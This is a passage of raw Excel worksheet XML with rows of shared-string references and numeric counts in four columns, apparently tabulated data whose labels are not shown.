    <row r="13880" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13880" t="s">
        <v>16228</v>
      </c>
      <c r="B13880" t="s">
        <v>16217</v>
      </c>
      <c r="C13880">
        <v>10</v>
      </c>
      <c r="D13880">
        <v>5043</v>
      </c>
    </row>
    <row r="13881" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13881" t="s">
        <v>16231</v>
      </c>
      <c r="B13881" t="s">
        <v>16218</v>
      </c>
      <c r="C13881">
        <v>0</v>
      </c>
      <c r="D13881">
        <v>5043</v>
      </c>
    </row>
    <row r="13882" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13882" t="s">
        <v>16229</v>
      </c>
      <c r="B13882" t="s">
        <v>16219</v>
      </c>
      <c r="C13882">
        <v>0</v>
      </c>
      <c r="D13882">
        <v>5043</v>
      </c>
    </row>
    <row r="13883" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13883" t="s">
        <v>16230</v>
      </c>
      <c r="B13883" t="s">
        <v>16220</v>
      </c>
      <c r="C13883">
        <v>0</v>
      </c>
      <c r="D13883">
        <v>5043</v>
      </c>
    </row>
    <row r="13884" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13884" t="s">
        <v>16229</v>
      </c>
      <c r="B13884" t="s">
        <v>16221</v>
      </c>
      <c r="C13884">
        <v>0</v>
      </c>
      <c r="D13884">
        <v>5043</v>
      </c>
    </row>
    <row r="13885" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13885" t="s">
        <v>16230</v>
      </c>
      <c r="B13885" t="s">
        <v>16222</v>
      </c>
      <c r="C13885">
        <v>0</v>
      </c>
      <c r="D13885">
        <v>5043</v>
      </c>
    </row>
    <row r="13886" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13886" t="s">
        <v>16223</v>
      </c>
      <c r="B13886" t="s">
        <v>16223</v>
      </c>
      <c r="C13886">
        <v>25</v>
      </c>
      <c r="D13886">
        <v>5043</v>
      </c>
    </row>
    <row r="13887" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13887" t="s">
        <v>16224</v>
      </c>
      <c r="B13887" t="s">
        <v>16224</v>
      </c>
      <c r="C13887">
        <v>1</v>
      </c>
      <c r="D13887">
        <v>5043</v>
      </c>
    </row>
    <row r="13888" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13888" t="s">
        <v>16223</v>
      </c>
      <c r="B13888" t="s">
        <v>16223</v>
      </c>
      <c r="C13888">
        <v>25</v>
      </c>
      <c r="D13888">
        <v>1270</v>
      </c>
    </row>
    <row r="13889" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13889" t="s">
        <v>16224</v>
      </c>
      <c r="B13889" t="s">
        <v>16224</v>
      </c>
      <c r="C13889">
        <v>1</v>
      </c>
      <c r="D13889">
        <v>1270</v>
      </c>
    </row>
    <row r="13890" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13890" t="s">
        <v>16228</v>
      </c>
      <c r="B13890" t="s">
        <v>16215</v>
      </c>
      <c r="C13890">
        <v>2</v>
      </c>
      <c r="D13890">
        <v>1190</v>
      </c>
    </row>
    <row r="13891" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13891" t="s">
        <v>16228</v>
      </c>
      <c r="B13891" t="s">
        <v>16217</v>
      </c>
      <c r="C13891">
        <v>5</v>
      </c>
      <c r="D13891">
        <v>1190</v>
      </c>
    </row>
    <row r="13892" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13892" t="s">
        <v>16231</v>
      </c>
      <c r="B13892" t="s">
        <v>16218</v>
      </c>
      <c r="C13892">
        <v>0</v>
      </c>
      <c r="D13892">
        <v>1190</v>
      </c>
    </row>
    <row r="13893" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13893" t="s">
        <v>16229</v>
      </c>
      <c r="B13893" t="s">
        <v>16221</v>
      </c>
      <c r="C13893">
        <v>0</v>
      </c>
      <c r="D13893">
        <v>1190</v>
      </c>
    </row>
    <row r="13894" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13894" t="s">
        <v>16230</v>
      </c>
      <c r="B13894" t="s">
        <v>16222</v>
      </c>
      <c r="C13894">
        <v>0</v>
      </c>
      <c r="D13894">
        <v>1190</v>
      </c>
    </row>
    <row r="13895" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13895" t="s">
        <v>16228</v>
      </c>
      <c r="B13895" t="s">
        <v>16211</v>
      </c>
      <c r="C13895">
        <v>0</v>
      </c>
      <c r="D13895">
        <v>5064</v>
      </c>
    </row>
    <row r="13896" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13896" t="s">
        <v>16231</v>
      </c>
      <c r="B13896" t="s">
        <v>16212</v>
      </c>
      <c r="C13896">
        <v>0</v>
      </c>
      <c r="D13896">
        <v>5064</v>
      </c>
    </row>
    <row r="13897" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13897" t="s">
        <v>16228</v>
      </c>
      <c r="B13897" t="s">
        <v>16213</v>
      </c>
      <c r="C13897">
        <v>0</v>
      </c>
      <c r="D13897">
        <v>5064</v>
      </c>
    </row>
    <row r="13898" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13898" t="s">
        <v>16231</v>
      </c>
      <c r="B13898" t="s">
        <v>16214</v>
      </c>
      <c r="C13898">
        <v>0</v>
      </c>
      <c r="D13898">
        <v>5064</v>
      </c>
    </row>
    <row r="13899" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13899" t="s">
        <v>16228</v>
      </c>
      <c r="B13899" t="s">
        <v>16215</v>
      </c>
      <c r="C13899">
        <v>0</v>
      </c>
      <c r="D13899">
        <v>5064</v>
      </c>
    </row>
    <row r="13900" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13900" t="s">
        <v>16231</v>
      </c>
      <c r="B13900" t="s">
        <v>16216</v>
      </c>
      <c r="C13900">
        <v>0</v>
      </c>
      <c r="D13900">
        <v>5064</v>
      </c>
    </row>
    <row r="13901" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13901" t="s">
        <v>16228</v>
      </c>
      <c r="B13901" t="s">
        <v>16217</v>
      </c>
      <c r="C13901">
        <v>4</v>
      </c>
      <c r="D13901">
        <v>5064</v>
      </c>
    </row>
    <row r="13902" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13902" t="s">
        <v>16231</v>
      </c>
      <c r="B13902" t="s">
        <v>16218</v>
      </c>
      <c r="C13902">
        <v>0</v>
      </c>
      <c r="D13902">
        <v>5064</v>
      </c>
    </row>
    <row r="13903" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13903" t="s">
        <v>16229</v>
      </c>
      <c r="B13903" t="s">
        <v>16219</v>
      </c>
      <c r="C13903">
        <v>0</v>
      </c>
      <c r="D13903">
        <v>5064</v>
      </c>
    </row>
    <row r="13904" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13904" t="s">
        <v>16230</v>
      </c>
      <c r="B13904" t="s">
        <v>16220</v>
      </c>
      <c r="C13904">
        <v>0</v>
      </c>
      <c r="D13904">
        <v>5064</v>
      </c>
    </row>
    <row r="13905" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13905" t="s">
        <v>16229</v>
      </c>
      <c r="B13905" t="s">
        <v>16221</v>
      </c>
      <c r="C13905">
        <v>0</v>
      </c>
      <c r="D13905">
        <v>5064</v>
      </c>
    </row>
    <row r="13906" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13906" t="s">
        <v>16230</v>
      </c>
      <c r="B13906" t="s">
        <v>16222</v>
      </c>
      <c r="C13906">
        <v>0</v>
      </c>
      <c r="D13906">
        <v>5064</v>
      </c>
    </row>
    <row r="13907" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13907" t="s">
        <v>16223</v>
      </c>
      <c r="B13907" t="s">
        <v>16223</v>
      </c>
      <c r="C13907">
        <v>30</v>
      </c>
      <c r="D13907">
        <v>5064</v>
      </c>
    </row>
    <row r="13908" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13908" t="s">
        <v>16224</v>
      </c>
      <c r="B13908" t="s">
        <v>16224</v>
      </c>
      <c r="C13908">
        <v>1</v>
      </c>
      <c r="D13908">
        <v>5064</v>
      </c>
    </row>
    <row r="13909" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13909" t="s">
        <v>16228</v>
      </c>
      <c r="B13909" t="s">
        <v>16211</v>
      </c>
      <c r="C13909">
        <v>0</v>
      </c>
      <c r="D13909">
        <v>1554</v>
      </c>
    </row>
    <row r="13910" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13910" t="s">
        <v>16231</v>
      </c>
      <c r="B13910" t="s">
        <v>16212</v>
      </c>
      <c r="C13910">
        <v>0</v>
      </c>
      <c r="D13910">
        <v>1554</v>
      </c>
    </row>
    <row r="13911" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13911" t="s">
        <v>16228</v>
      </c>
      <c r="B13911" t="s">
        <v>16213</v>
      </c>
      <c r="C13911">
        <v>0</v>
      </c>
      <c r="D13911">
        <v>1554</v>
      </c>
    </row>
    <row r="13912" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13912" t="s">
        <v>16231</v>
      </c>
      <c r="B13912" t="s">
        <v>16214</v>
      </c>
      <c r="C13912">
        <v>0</v>
      </c>
      <c r="D13912">
        <v>1554</v>
      </c>
    </row>
    <row r="13913" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13913" t="s">
        <v>16228</v>
      </c>
      <c r="B13913" t="s">
        <v>16215</v>
      </c>
      <c r="C13913">
        <v>1</v>
      </c>
      <c r="D13913">
        <v>1554</v>
      </c>
    </row>
    <row r="13914" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13914" t="s">
        <v>16231</v>
      </c>
      <c r="B13914" t="s">
        <v>16216</v>
      </c>
      <c r="C13914">
        <v>1</v>
      </c>
      <c r="D13914">
        <v>1554</v>
      </c>
    </row>
    <row r="13915" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13915" t="s">
        <v>16228</v>
      </c>
      <c r="B13915" t="s">
        <v>16217</v>
      </c>
      <c r="C13915">
        <v>2</v>
      </c>
      <c r="D13915">
        <v>1554</v>
      </c>
    </row>
    <row r="13916" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13916" t="s">
        <v>16231</v>
      </c>
      <c r="B13916" t="s">
        <v>16218</v>
      </c>
      <c r="C13916">
        <v>0</v>
      </c>
      <c r="D13916">
        <v>1554</v>
      </c>
    </row>
    <row r="13917" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13917" t="s">
        <v>16229</v>
      </c>
      <c r="B13917" t="s">
        <v>16219</v>
      </c>
      <c r="C13917">
        <v>0</v>
      </c>
      <c r="D13917">
        <v>1554</v>
      </c>
    </row>
    <row r="13918" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13918" t="s">
        <v>16230</v>
      </c>
      <c r="B13918" t="s">
        <v>16220</v>
      </c>
      <c r="C13918">
        <v>1</v>
      </c>
      <c r="D13918">
        <v>1554</v>
      </c>
    </row>
    <row r="13919" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13919" t="s">
        <v>16229</v>
      </c>
      <c r="B13919" t="s">
        <v>16221</v>
      </c>
      <c r="C13919">
        <v>4</v>
      </c>
      <c r="D13919">
        <v>1554</v>
      </c>
    </row>
    <row r="13920" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13920" t="s">
        <v>16230</v>
      </c>
      <c r="B13920" t="s">
        <v>16222</v>
      </c>
      <c r="C13920">
        <v>0</v>
      </c>
      <c r="D13920">
        <v>1554</v>
      </c>
    </row>
    <row r="13921" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13921" t="s">
        <v>16223</v>
      </c>
      <c r="B13921" t="s">
        <v>16223</v>
      </c>
      <c r="C13921">
        <v>28</v>
      </c>
      <c r="D13921">
        <v>1554</v>
      </c>
    </row>
    <row r="13922" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13922" t="s">
        <v>16224</v>
      </c>
      <c r="B13922" t="s">
        <v>16224</v>
      </c>
      <c r="C13922">
        <v>0</v>
      </c>
      <c r="D13922">
        <v>1554</v>
      </c>
    </row>
    <row r="13923" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13923" t="s">
        <v>16228</v>
      </c>
      <c r="B13923" t="s">
        <v>16217</v>
      </c>
      <c r="C13923">
        <v>3</v>
      </c>
      <c r="D13923">
        <v>1554</v>
      </c>
    </row>
    <row r="13924" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13924" t="s">
        <v>16224</v>
      </c>
      <c r="B13924" t="s">
        <v>16224</v>
      </c>
      <c r="C13924">
        <v>1</v>
      </c>
      <c r="D13924">
        <v>1554</v>
      </c>
    </row>
    <row r="13925" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13925" t="s">
        <v>16231</v>
      </c>
      <c r="B13925" t="s">
        <v>16216</v>
      </c>
      <c r="C13925">
        <v>4</v>
      </c>
      <c r="D13925">
        <v>21</v>
      </c>
    </row>
    <row r="13926" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13926" t="s">
        <v>16228</v>
      </c>
      <c r="B13926" t="s">
        <v>16217</v>
      </c>
      <c r="C13926">
        <v>3</v>
      </c>
      <c r="D13926">
        <v>21</v>
      </c>
    </row>
    <row r="13927" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13927" t="s">
        <v>16231</v>
      </c>
      <c r="B13927" t="s">
        <v>16218</v>
      </c>
      <c r="C13927">
        <v>2</v>
      </c>
      <c r="D13927">
        <v>21</v>
      </c>
    </row>
    <row r="13928" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13928" t="s">
        <v>16229</v>
      </c>
      <c r="B13928" t="s">
        <v>16221</v>
      </c>
      <c r="C13928">
        <v>0</v>
      </c>
      <c r="D13928">
        <v>21</v>
      </c>
    </row>
    <row r="13929" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13929" t="s">
        <v>16230</v>
      </c>
      <c r="B13929" t="s">
        <v>16222</v>
      </c>
      <c r="C13929">
        <v>0</v>
      </c>
      <c r="D13929">
        <v>21</v>
      </c>
    </row>
    <row r="13930" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13930" t="s">
        <v>16228</v>
      </c>
      <c r="B13930" t="s">
        <v>16211</v>
      </c>
      <c r="C13930">
        <v>0</v>
      </c>
      <c r="D13930">
        <v>2813</v>
      </c>
    </row>
    <row r="13931" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13931" t="s">
        <v>16231</v>
      </c>
      <c r="B13931" t="s">
        <v>16212</v>
      </c>
      <c r="C13931">
        <v>0</v>
      </c>
      <c r="D13931">
        <v>2813</v>
      </c>
    </row>
    <row r="13932" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13932" t="s">
        <v>16228</v>
      </c>
      <c r="B13932" t="s">
        <v>16213</v>
      </c>
      <c r="C13932">
        <v>0</v>
      </c>
      <c r="D13932">
        <v>2813</v>
      </c>
    </row>
    <row r="13933" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13933" t="s">
        <v>16231</v>
      </c>
      <c r="B13933" t="s">
        <v>16214</v>
      </c>
      <c r="C13933">
        <v>0</v>
      </c>
      <c r="D13933">
        <v>2813</v>
      </c>
    </row>
    <row r="13934" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13934" t="s">
        <v>16228</v>
      </c>
      <c r="B13934" t="s">
        <v>16215</v>
      </c>
      <c r="C13934">
        <v>4</v>
      </c>
      <c r="D13934">
        <v>2813</v>
      </c>
    </row>
    <row r="13935" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13935" t="s">
        <v>16231</v>
      </c>
      <c r="B13935" t="s">
        <v>16216</v>
      </c>
      <c r="C13935">
        <v>0</v>
      </c>
      <c r="D13935">
        <v>2813</v>
      </c>
    </row>
    <row r="13936" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13936" t="s">
        <v>16228</v>
      </c>
      <c r="B13936" t="s">
        <v>16217</v>
      </c>
      <c r="C13936">
        <v>0</v>
      </c>
      <c r="D13936">
        <v>2813</v>
      </c>
    </row>
    <row r="13937" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13937" t="s">
        <v>16231</v>
      </c>
      <c r="B13937" t="s">
        <v>16218</v>
      </c>
      <c r="C13937">
        <v>0</v>
      </c>
      <c r="D13937">
        <v>2813</v>
      </c>
    </row>
    <row r="13938" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13938" t="s">
        <v>16229</v>
      </c>
      <c r="B13938" t="s">
        <v>16219</v>
      </c>
      <c r="C13938">
        <v>10</v>
      </c>
      <c r="D13938">
        <v>2813</v>
      </c>
    </row>
    <row r="13939" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13939" t="s">
        <v>16230</v>
      </c>
      <c r="B13939" t="s">
        <v>16220</v>
      </c>
      <c r="C13939">
        <v>0</v>
      </c>
      <c r="D13939">
        <v>2813</v>
      </c>
    </row>
    <row r="13940" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13940" t="s">
        <v>16229</v>
      </c>
      <c r="B13940" t="s">
        <v>16221</v>
      </c>
      <c r="C13940">
        <v>0</v>
      </c>
      <c r="D13940">
        <v>2813</v>
      </c>
    </row>
    <row r="13941" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13941" t="s">
        <v>16230</v>
      </c>
      <c r="B13941" t="s">
        <v>16222</v>
      </c>
      <c r="C13941">
        <v>0</v>
      </c>
      <c r="D13941">
        <v>2813</v>
      </c>
    </row>
    <row r="13942" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13942" t="s">
        <v>16223</v>
      </c>
      <c r="B13942" t="s">
        <v>16223</v>
      </c>
      <c r="C13942">
        <v>30</v>
      </c>
      <c r="D13942">
        <v>2813</v>
      </c>
    </row>
    <row r="13943" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13943" t="s">
        <v>16224</v>
      </c>
      <c r="B13943" t="s">
        <v>16224</v>
      </c>
      <c r="C13943">
        <v>0</v>
      </c>
      <c r="D13943">
        <v>2813</v>
      </c>
    </row>
    <row r="13944" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13944" t="s">
        <v>16228</v>
      </c>
      <c r="B13944" t="s">
        <v>16211</v>
      </c>
      <c r="C13944">
        <v>0</v>
      </c>
      <c r="D13944">
        <v>549</v>
      </c>
    </row>
    <row r="13945" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13945" t="s">
        <v>16231</v>
      </c>
      <c r="B13945" t="s">
        <v>16212</v>
      </c>
      <c r="C13945">
        <v>0</v>
      </c>
      <c r="D13945">
        <v>549</v>
      </c>
    </row>
    <row r="13946" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13946" t="s">
        <v>16228</v>
      </c>
      <c r="B13946" t="s">
        <v>16213</v>
      </c>
      <c r="C13946">
        <v>0</v>
      </c>
      <c r="D13946">
        <v>549</v>
      </c>
    </row>
    <row r="13947" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13947" t="s">
        <v>16231</v>
      </c>
      <c r="B13947" t="s">
        <v>16214</v>
      </c>
      <c r="C13947">
        <v>0</v>
      </c>
      <c r="D13947">
        <v>549</v>
      </c>
    </row>
    <row r="13948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13948" t="s">
        <v>16228</v>
      </c>
      <c r="B13948" t="s">
        <v>16215</v>
      </c>
      <c r="C13948">
        <v>24</v>
      </c>
      <c r="D13948">
        <v>549</v>
      </c>
    </row>
    <row r="13949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13949" t="s">
        <v>16231</v>
      </c>
      <c r="B13949" t="s">
        <v>16216</v>
      </c>
      <c r="C13949">
        <v>7</v>
      </c>
      <c r="D13949">
        <v>549</v>
      </c>
    </row>
    <row r="13950" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13950" t="s">
        <v>16228</v>
      </c>
      <c r="B13950" t="s">
        <v>16217</v>
      </c>
      <c r="C13950">
        <v>25</v>
      </c>
      <c r="D13950">
        <v>549</v>
      </c>
    </row>
    <row r="13951" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13951" t="s">
        <v>16231</v>
      </c>
      <c r="B13951" t="s">
        <v>16218</v>
      </c>
      <c r="C13951">
        <v>11</v>
      </c>
      <c r="D13951">
        <v>549</v>
      </c>
    </row>
    <row r="13952" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13952" t="s">
        <v>16229</v>
      </c>
      <c r="B13952" t="s">
        <v>16219</v>
      </c>
      <c r="C13952">
        <v>8</v>
      </c>
      <c r="D13952">
        <v>549</v>
      </c>
    </row>
    <row r="13953" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13953" t="s">
        <v>16230</v>
      </c>
      <c r="B13953" t="s">
        <v>16220</v>
      </c>
      <c r="C13953">
        <v>9</v>
      </c>
      <c r="D13953">
        <v>549</v>
      </c>
    </row>
    <row r="13954" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13954" t="s">
        <v>16229</v>
      </c>
      <c r="B13954" t="s">
        <v>16221</v>
      </c>
      <c r="C13954">
        <v>67</v>
      </c>
      <c r="D13954">
        <v>549</v>
      </c>
    </row>
    <row r="13955" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13955" t="s">
        <v>16230</v>
      </c>
      <c r="B13955" t="s">
        <v>16222</v>
      </c>
      <c r="C13955">
        <v>28</v>
      </c>
      <c r="D13955">
        <v>549</v>
      </c>
    </row>
    <row r="13956" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13956" t="s">
        <v>16223</v>
      </c>
      <c r="B13956" t="s">
        <v>16223</v>
      </c>
      <c r="C13956">
        <v>25</v>
      </c>
      <c r="D13956">
        <v>549</v>
      </c>
    </row>
    <row r="13957" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13957" t="s">
        <v>16224</v>
      </c>
      <c r="B13957" t="s">
        <v>16224</v>
      </c>
      <c r="C13957">
        <v>1</v>
      </c>
      <c r="D13957">
        <v>549</v>
      </c>
    </row>
    <row r="13958" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13958" t="s">
        <v>16228</v>
      </c>
      <c r="B13958" t="s">
        <v>16211</v>
      </c>
      <c r="C13958">
        <v>0</v>
      </c>
      <c r="D13958">
        <v>1434</v>
      </c>
    </row>
    <row r="13959" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13959" t="s">
        <v>16231</v>
      </c>
      <c r="B13959" t="s">
        <v>16212</v>
      </c>
      <c r="C13959">
        <v>0</v>
      </c>
      <c r="D13959">
        <v>1434</v>
      </c>
    </row>
    <row r="13960" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13960" t="s">
        <v>16228</v>
      </c>
      <c r="B13960" t="s">
        <v>16213</v>
      </c>
      <c r="C13960">
        <v>0</v>
      </c>
      <c r="D13960">
        <v>1434</v>
      </c>
    </row>
    <row r="13961" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13961" t="s">
        <v>16231</v>
      </c>
      <c r="B13961" t="s">
        <v>16214</v>
      </c>
      <c r="C13961">
        <v>0</v>
      </c>
      <c r="D13961">
        <v>1434</v>
      </c>
    </row>
    <row r="13962" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13962" t="s">
        <v>16228</v>
      </c>
      <c r="B13962" t="s">
        <v>16215</v>
      </c>
      <c r="C13962">
        <v>5</v>
      </c>
      <c r="D13962">
        <v>1434</v>
      </c>
    </row>
    <row r="13963" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13963" t="s">
        <v>16231</v>
      </c>
      <c r="B13963" t="s">
        <v>16216</v>
      </c>
      <c r="C13963">
        <v>6</v>
      </c>
      <c r="D13963">
        <v>1434</v>
      </c>
    </row>
    <row r="13964" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13964" t="s">
        <v>16228</v>
      </c>
      <c r="B13964" t="s">
        <v>16217</v>
      </c>
      <c r="C13964">
        <v>1</v>
      </c>
      <c r="D13964">
        <v>1434</v>
      </c>
    </row>
    <row r="13965" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13965" t="s">
        <v>16231</v>
      </c>
      <c r="B13965" t="s">
        <v>16218</v>
      </c>
      <c r="C13965">
        <v>0</v>
      </c>
      <c r="D13965">
        <v>1434</v>
      </c>
    </row>
    <row r="13966" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13966" t="s">
        <v>16229</v>
      </c>
      <c r="B13966" t="s">
        <v>16219</v>
      </c>
      <c r="C13966">
        <v>15</v>
      </c>
      <c r="D13966">
        <v>1434</v>
      </c>
    </row>
    <row r="13967" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13967" t="s">
        <v>16230</v>
      </c>
      <c r="B13967" t="s">
        <v>16220</v>
      </c>
      <c r="C13967">
        <v>0</v>
      </c>
      <c r="D13967">
        <v>1434</v>
      </c>
    </row>
    <row r="13968" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13968" t="s">
        <v>16229</v>
      </c>
      <c r="B13968" t="s">
        <v>16221</v>
      </c>
      <c r="C13968">
        <v>0</v>
      </c>
      <c r="D13968">
        <v>1434</v>
      </c>
    </row>
    <row r="13969" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13969" t="s">
        <v>16230</v>
      </c>
      <c r="B13969" t="s">
        <v>16222</v>
      </c>
      <c r="C13969">
        <v>0</v>
      </c>
      <c r="D13969">
        <v>1434</v>
      </c>
    </row>
    <row r="13970" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13970" t="s">
        <v>16223</v>
      </c>
      <c r="B13970" t="s">
        <v>16223</v>
      </c>
      <c r="C13970">
        <v>20</v>
      </c>
      <c r="D13970">
        <v>1434</v>
      </c>
    </row>
    <row r="13971" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13971" t="s">
        <v>16224</v>
      </c>
      <c r="B13971" t="s">
        <v>16224</v>
      </c>
      <c r="C13971">
        <v>1</v>
      </c>
      <c r="D13971">
        <v>1434</v>
      </c>
    </row>
    <row r="13972" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13972" t="s">
        <v>16229</v>
      </c>
      <c r="B13972" t="s">
        <v>16221</v>
      </c>
      <c r="C13972">
        <v>3</v>
      </c>
      <c r="D13972">
        <v>1554</v>
      </c>
    </row>
    <row r="13973" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13973" t="s">
        <v>16228</v>
      </c>
      <c r="B13973" t="s">
        <v>16211</v>
      </c>
      <c r="C13973">
        <v>0</v>
      </c>
      <c r="D13973">
        <v>5099</v>
      </c>
    </row>
    <row r="13974" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13974" t="s">
        <v>16231</v>
      </c>
      <c r="B13974" t="s">
        <v>16212</v>
      </c>
      <c r="C13974">
        <v>0</v>
      </c>
      <c r="D13974">
        <v>5099</v>
      </c>
    </row>
    <row r="13975" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13975" t="s">
        <v>16228</v>
      </c>
      <c r="B13975" t="s">
        <v>16213</v>
      </c>
      <c r="C13975">
        <v>0</v>
      </c>
      <c r="D13975">
        <v>5099</v>
      </c>
    </row>
    <row r="13976" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13976" t="s">
        <v>16231</v>
      </c>
      <c r="B13976" t="s">
        <v>16214</v>
      </c>
      <c r="C13976">
        <v>0</v>
      </c>
      <c r="D13976">
        <v>5099</v>
      </c>
    </row>
    <row r="13977" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13977" t="s">
        <v>16228</v>
      </c>
      <c r="B13977" t="s">
        <v>16215</v>
      </c>
      <c r="C13977">
        <v>0</v>
      </c>
      <c r="D13977">
        <v>5099</v>
      </c>
    </row>
    <row r="13978" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13978" t="s">
        <v>16231</v>
      </c>
      <c r="B13978" t="s">
        <v>16216</v>
      </c>
      <c r="C13978">
        <v>1</v>
      </c>
      <c r="D13978">
        <v>5099</v>
      </c>
    </row>
    <row r="13979" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13979" t="s">
        <v>16228</v>
      </c>
      <c r="B13979" t="s">
        <v>16217</v>
      </c>
      <c r="C13979">
        <v>1</v>
      </c>
      <c r="D13979">
        <v>5099</v>
      </c>
    </row>
    <row r="13980" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13980" t="s">
        <v>16231</v>
      </c>
      <c r="B13980" t="s">
        <v>16218</v>
      </c>
      <c r="C13980">
        <v>2</v>
      </c>
      <c r="D13980">
        <v>5099</v>
      </c>
    </row>
    <row r="13981" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13981" t="s">
        <v>16229</v>
      </c>
      <c r="B13981" t="s">
        <v>16219</v>
      </c>
      <c r="C13981">
        <v>0</v>
      </c>
      <c r="D13981">
        <v>5099</v>
      </c>
    </row>
    <row r="13982" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13982" t="s">
        <v>16230</v>
      </c>
      <c r="B13982" t="s">
        <v>16220</v>
      </c>
      <c r="C13982">
        <v>0</v>
      </c>
      <c r="D13982">
        <v>5099</v>
      </c>
    </row>
    <row r="13983" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13983" t="s">
        <v>16229</v>
      </c>
      <c r="B13983" t="s">
        <v>16221</v>
      </c>
      <c r="C13983">
        <v>0</v>
      </c>
      <c r="D13983">
        <v>5099</v>
      </c>
    </row>
    <row r="13984" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13984" t="s">
        <v>16230</v>
      </c>
      <c r="B13984" t="s">
        <v>16222</v>
      </c>
      <c r="C13984">
        <v>0</v>
      </c>
      <c r="D13984">
        <v>5099</v>
      </c>
    </row>
